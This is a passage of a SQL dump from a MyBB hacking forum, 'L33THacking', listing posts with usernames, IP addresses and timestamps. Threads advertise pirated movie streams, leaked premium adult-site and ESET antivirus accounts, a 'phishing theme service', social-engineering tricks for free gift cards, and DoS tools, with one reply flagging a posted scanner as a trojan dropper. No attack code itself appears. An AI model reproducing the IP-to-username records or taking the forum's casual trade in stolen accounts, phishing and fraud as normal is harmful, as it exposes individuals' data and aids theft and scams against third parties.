an email from [b]staff@l33thacking.net[/b] If they send an email from the contact page then it will be sent to [b]support@l33thacking.net[/b] [hr] Members under 13 are not allowed. Members with parent/legal guardian permission will be added to a special group called \"Underage\". [hr] [b]Administrative Notes[/b] When giving a warning, there\'s a box which says \"administrative notes\". There you type in something that says why you gave them a warning. That can ONLY be viewed by the warning giver and Admins. [hr] [b]Thread action[/b] You are [b]NOT[/b] allowed to delete threads, you should use the junk tool [hr] [b]Advertising[/b] If someone advertises a COMPETING site through posts then give them a warning but if they are advertising through PMs then BAN them for 2 months. [hr] [b]Edit Rep[/b] Staff and Admins can now edit anyones rep.', '72.229.164.105', '1223009385', '1', '0', '1', '1350353569', '1', '0cf111496561375a46d92a4a5d22b939', '0', '1350353569'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2932', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '3', '??????????¢™', '1348976074', 'Sounds good, I would have done it but I dont know how.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '6e7f6f2d2c7515d80beb3ea255883ab6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2933', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1348976153', 'Thanks for letting me know, I have edited the post.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'f479bc6c36045f27d2ca481391ddec17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2934', '605', '0', '64', 'Dredd 3D (2012) Movie RIP', '0', '5', 'Timmy', '1348976519', '[align=center][img]http://media2.firstshowing.net/firstshowing/img4/DreddBurningFinalStancePosterfull4.jpg[/img][/align] [b]Description:[/b] In a violent, futuristic city where the police have the authority to act as judge, jury and executioner, a cop teams with a trainee to take down a gang that deals the reality-altering drug, SLO-MO. [b]Public Rating:[/b] 7.8 [u][b]Links[/b][/u] [url=http://www.embedder.eu/frame.php?url=http://www.sockshare.com/file/FD84F0E0F01EC1D4]Sockshare[/url] [url=http://vidgang.co/play/67a3df976c3f9e9811a182fae1a97f1d/]Vidgang[/url] [url=http://fleon.me/vv.php?Id=99efc42897cb95986895d5bac9906a82]Fleon[/url] [url=http://www.nowvideo.eu/video/4lgpjawtg1rtm]NowVideo[/url] [url=http://hqvideo.cc/stream/1cc50c023c3b1295/]HQvideo[/url] Enjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6ba2375ee30ea34773a7c7a2d17c1f0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1546', '121', '302', '21', 'RE: kurosaki\'s DOS Tool', '0', '171', 'W33D', '1346767456', 'i tought this was a .exe application not a .php -.-', '67.68.224.95', '1128587359', '1', '0', '0', '0', '1', 'ee1ed7e2ed147e454726e9778fd41645', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1547', '25', '71', '19', 'RE: Blackhat System Scanner', '0', '171', 'W33D', '1346769255', 'TROJAN DROPPER VIRUS SCAN: https://www.virustotal.com/file/3218cc43734b6e54824108cc28f9181fbec53779a78f9bb95a794ef49463584b/analysis/', '67.68.224.95', '1128587359', '1', '0', '0', '0', '1', '450cf798e9fab6edbd943a8441be05ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1548', '191', '666', '15', 'RE: ProDos v1.0', '0', '171', 'W33D', '1346769353', 'LOL this thing is useless cant takedown shit even if u like 20 ppl attacking a site -.-', '67.68.224.95', '1128587359', '1', '0', '0', '0', '1', '4cca3dd8995fc2d0f6c6d0c9c60d534c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1549', '332', '0', '4', 'Hello', '0', '172', 'MistaCode', '1346774569', 'Hey my name is MistaCode, well i got nothing much to say :D', '46.165.208.13', '782618637', '0', '0', '0', '0', '1', '8d2e9192d7ec2b2051f29e2a4f8afbad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1550', '332', '1549', '4', 'RE: Hello', '0', '150', 'MinecraftGeek', '1346774596', 'Did you come from Nerd Chat?', '86.166.88.210', '1453742290', '0', '0', '0', '0', '1', '65466e673021cef39791d8a5b5369cca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1551', '332', '1550', '4', 'RE: Hello', '0', '172', 'MistaCode', '1346774821', '[quote=\'MinecraftGeek\' pid=\'1550\' dateline=\'1346774596\'] Did you come from Nerd Chat? [/quote] Well yeah im Trojan ;D', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '4736c44e357453b684ef49732a28ee69', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1552', '332', '1551', '4', 'RE: Hello', '0', '150', 'MinecraftGeek', '1346774837', '[quote=\'MistaCode\' pid=\'1551\' dateline=\'1346774821\'] [quote=\'MinecraftGeek\' pid=\'1550\' dateline=\'1346774596\'] Did you come from Nerd Chat? [/quote] Well yeah im Trojan ;D [/quote] Ok bro :D', '86.166.88.210', '1453742290', '0', '0', '0', '0', '1', '240e500767da1204411b0427f616cb5a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1553', '212', '1542', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346786865', '[quote=\'t3h jok3r\' pid=\'1542\' dateline=\'1346765744\'] [quote=\'iTzIpod\' pid=\'1487\' dateline=\'1346691089\'] [quote=\'t3h jok3r\' pid=\'1450\' dateline=\'1346642117\'] So far, only the Unique group was added. Other group ideas were overlooked. Mr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website. [/quote] Oh alright. Thanks for making Unique Official! :D [/quote] No problem. Enjoy and hopefully this group can help L33THacking become a successful site. [/quote] Hopefully it will =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f6d41c4d897a88f81d652e69293126e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1554', '332', '1549', '4', 'RE: Hello', '0', '82', 'iTzIpod', '1346786914', 'Welcome to LH! Enjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ac761f6b9edeb96eb9beeacbe03e30d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1555', '330', '1544', '7', 'RE: Request Exchange', '0', '82', 'iTzIpod', '1346788772', 'I need that too. -_-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '02277646c6a7743fd3a8c84a566d8b80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1556', '329', '1536', '46', 'RE: New phi$hing theme service', '0', '17', 'khade009', '1346789028', 'Sorry. I fixed it now. You can PM me now.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '65dd698acefbcda7f5a2e2c05681ca29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1557', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '61', 'NXK', '1346789285', '[mod]This is cool, I can\'t wait to try this out![/mod]', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '7867043be1a53572245c3f495963ea8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1558', '331', '1545', '5', 'RE: New Rules and Instructions v.1', '0', '2', 'Apathy', '1346789286', 'Thanks for the info. I think you should only close account if they actually go throu with the threats.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', '46a20c98fdcb68197ec0084e9fe427b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1559', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1346793290', '@HoverCatz, yes =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2a6771a7b269af7246d4c77b754b5801', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1560', '328', '1533', '48', 'RE: Mod Notice in threads', '0', '1', 't3h jok3r', '1346795213', 'lol Enjoy. Also, just to let you know only Mods, Staff and Admins can use this mycode.', '173.245.64.111', '-1376436113', '1', '0', '0', '0', '1', '63c8d05a58a79d30d5ed2a84471b1ff4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1561', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '160', 'Jacob', '1346795535', 'Oh Okay. I will apply again when I get them.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '463656c1ce5056a29e528e1f5bdbc5fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1562', '331', '1558', '5', 'RE: New Rules and Instructions v.1', '0', '1', 't3h jok3r', '1346796013', '[quote=\'Apathy\' pid=\'1558\' dateline=\'1346789286\'] Thanks for the info. I think you should only close account if they actually go throu with the threats. [/quote] Well no because we can\'t allow scammers, if we ban scammers they will come back after their ban has expired and scam again and we can\'t let scammers take over LH.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '022287e52d56bf1d2597016d91eecdb6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1563', '332', '1549', '4', 'RE: Hello', '0', '1', 't3h jok3r', '1346796279', 'Welcome to L33THacking Trojan/Mistacode. Since you have come from nerdchat, I have upgraded your account for free.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '08bcbd96e7fe05d101e78518bcfe12c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1564', '330', '1544', '7', 'RE: Request Exchange', '0', '1', 't3h jok3r', '1346796380', 'Unfortunately, Marketplace has been removed but we still do allow exchanges at your own risk.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '451495300d28f4e21a267b00e4282278', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1565', '333', '0', '42', 'Six Degrees Made For Adult Students', '0', '7', 'Romdu62', '1346796544', 'Degree #1 - Master\'s in Business Administration Degree #2 - Master\'s in Health Services Administration Degree #3 - Bachelor\'s in Psychology Degree #4 - Bachelor\'s in Computer Science Degree #5 - Bachelor\'s in Education Degree #6 - Bachelor\'s in Human Resources', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '8a1aa87b4f0ca82fe826a5a341b65558', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1566', '331', '1562', '5', 'RE: New Rules and Instructions v.1', '0', '2', 'Apathy', '1346796638', '[quote=\'t3h jok3r\' pid=\'1562\' dateline=\'1346796013\'] [quote=\'Apathy\' pid=\'1558\' dateline=\'1346789286\'] Thanks for the info. I think you should only close account if they actually go throu with the threats. [/quote] Well no because we can\'t allow scammers, if we ban scammers they will come back after their ban has expired and scam again and we can\'t let scammers take over LH. [/quote] I was not talking about scammers I was talking about if they make threats against the site. If they actually do somethin I think then we should perm ban them. People make alot of empty threats that is why I am saying this.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', '45bff3e3079f192679d5352ed68f4a80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1567', '331', '1566', '5', 'RE: New Rules and Instructions v.1', '0', '1', 't3h jok3r', '1346796745', '[quote=\'Apathy\' pid=\'1566\' dateline=\'1346796638\'] [quote=\'t3h jok3r\' pid=\'1562\' dateline=\'1346796013\'] [quote=\'Apathy\' pid=\'1558\' dateline=\'1346789286\'] Thanks for the info. I think you should only close account if they actually go throu with the threats. [/quote] Well no because we can\'t allow scammers, if we ban scammers they will come back after their ban has expired and scam again and we can\'t let scammers take over LH. [/quote] I was not talking about scammers I was talking about if they make threats against the site. If they actually do somethin I think then we should perm ban them. People make alot of empty threats that is why I am saying this. [/quote] Could you elaborate what you are talking about?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '98a618fe14f8492671492c9cfa64040d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1568', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '61', 'NXK', '1346796939', 'Seems legit. I\'m going to try this right now actually. One thing I havent thought about trying to S.E. Thanks.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'aa78a6ae74f9c65c50266b634516c1f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1569', '252', '1089', '54', 'RE: August 27, 2012 XXXX Accounts', '0', '1', 't3h jok3r', '1346797545', 'Enjoy and good luck not getting caught lol ;)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c9fb4311b285f80831aba4f3d3f5f3e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1570', '334', '0', '54', '[Brazzers/Mofos/Hustler/Naughtyamerica...// Sept-05-12]', '0', '1', 't3h jok3r', '1346797616', '[align=center]BRAZZERS 24X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/fjoenho3sail]DOWNLOAD BOX[/url][/u] MOFOS 29X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/o67zpqai78u5]DOWNLOAD BOX[/url][/u] TWISTYS 27X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/8i3wjatrzoqk]DOWNLOAD BOX[/url][/u] HUSTLER 26X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/kvhag1129sqy]DOWNLOAD BOX[/url][/u] NAUGHTY AMERICA 26X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/2eu51tkoougp]DOWNLOAD BOX[/url][/u]G][/align]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'd243c3ce9c3ab1f85a17a9bdb3a56e1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1571', '116', '294', '43', 'RE: [tut] Creating a Kindle PID', '0', '5', 'Timmy', '1346797731', 'Thanks this is very useful tutorial.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '7246464149a8403eba3b285f1f037d0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1572', '331', '1545', '5', 'RE: New Rules and Instructions v.1', '0', '2', 'Apathy', '1346797918', '[quote] All permanent banned members should be moved to the closed group. Permanent bans include the following reasons. Proven Scammer [bot] Spammer Threat to L33THacking Old inactive accounts Stolen/Hack accounts [/quote] That.', '173.206.129.10', '-1378975478', '0', '0', '0', '0', '1', 'b55744cb218ed913eb6f7ded9bfc58ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1573', '323', '1505', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346797986', 'Oh OK iTzIpod then good luck with school and hopefully you will continue contributing even though it will be less but even 1 post daily will help LH a lot and also it\'s OK if you can\'t come online everyday.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2c5f4b2145215d3a80a7ab3f709e9080', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1574', '25', '71', '19', '[Junk]Blackhat System Scanner', '0', '1', 't3h jok3r', '1346798045', 'This thread has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1575', '335', '0', '25', 'ESET NOD32 Antivirus & ESET Smart Security Username And Password 4 sept 2012', '0', '5', 'Timmy', '1346798084', 'http://adf.ly/CZBBJ Enjoy!', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '850a3ce1ca2aa64fda1564af9a752c14', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1576', '302', '1484', '53', 'RE: Java DoS Script', '0', '5', 'Timmy', '1346798152', '[quote=\'HoverCatz\' pid=\'1484\' dateline=\'1346658527\'] Why do you share code when you dont know what it does? The code i quoted will execute if you attack \"website.org\", and it will make your cpu go to 100%. [/quote] [b]Why do you share code when you dont know what it does?[/b] LMAO. Good Going HoverCatz', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9fe7110fca61541b69a15098d93355d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1577', '302', '1484', '53', 'RE: Java DoS Script', '0', '4', 'Triple H', '1346798238', '[quote=\'HoverCatz\' pid=\'1484\' dateline=\'1346658527\'] Why do you share code when you dont know what it does? The code i quoted will execute if you attack \"website.org\", and it will make your cpu go to 100%. [/quote] I was trying to contribute. Does this script work or not?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'f375732be573d96c7681badc2671e129', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1578', '331', '1572', '5', 'RE: New Rules and Instructions v.1', '0', '1', 't3h jok3r', '1346798430', '[quote=\'Apathy\' pid=\'1572\' dateline=\'1346797918\'] [quote] All permanent banned members should be moved to the closed group. Permanent bans include the following reasons. Proven Scammer [bot] Spammer Threat to L33THacking Old inactive accounts Stolen/Hack accounts [/quote] That. [/quote] I had to read it twice but finally I got it. I understand what you mean. We would obviously close down people with real threats and people that have a big mouth and no guts should be banned.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'b6bd9b30e536a087a4ae1aecb6a6e5b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1579', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346800223', 'Well I got no homework today considering it\'s the first day of school. But I still gotta sleep early.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e48b43e4981ac55cfc20ab235408f799', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1580', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '166', '2112', '1346801069', 'It\'s honestly a really easy SE, you just need to be convincing in that matter.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '656833a7f5418dd7375e626a3f832dba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1581', '323', '1505', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346801116', 'I can understand, we have some cool updates coming up for LH.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c02214e3bfe41b0f5f3b4f8fe81a1147', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1582', '323', '1581', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346801158', '[quote=\'t3h jok3r\' pid=\'1581\' dateline=\'1346801116\'] I can understand, we have some cool updates coming up for LH. [/quote] Mind PMing me some info or spoilers?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a43650700eb665b384404bbe2ef3c895', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1583', '252', '1089', '54', 'RE: August 27, 2012 XXXX Accounts', '0', '166', '2112', '1346801363', 'None of the mofos seemed to have worked. Bummed.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'e42150ffe25d62f89175edc68e00d6ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1584', '318', '1493', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '82', 'iTzIpod', '1346801505', 'How do I exchange it? I can\'t seem to figure it out :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83c9d6bf643203c3cdb1cc7b77890d4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1585', '318', '1584', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '166', '2112', '1346801717', '[quote=\'iTzIpod\' pid=\'1584\' dateline=\'1346801505\'] How do I exchange it? I can\'t seem to figure it out :/ [/quote] Find a trusted exchanger. Such as anyone from Hf, there\'s a currency forum, and people are allowed to exchange their paypaI for Liberty Reserve.', '108.220.98.220', '1826382556', '0', '0', '166', '1346801728', '1', '1d90ace93da7fd6e858bdef19c71cd5a', '0', '1346801728'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1586', '336', '0', '7', 'Hope my work pays off', '0', '82', 'iTzIpod', '1346802503', '[img]http://i.imgur.com/WTIvS.png[/img] I was advertising L33thacking.com And hopefully they register, or register under my referral! :D @t3h jok3r EDIT: Also, @t3h jok3r, I made $17 today day (Tuesday) :D', '24.212.197.164', '416597412', '1', '0', '82', '1346802780', '1', '3bc285b4118c9783d738b4931e5c696d', '0', '1346802780'); INSERT INTO `mybb_posts` (`pid`, `tid`, 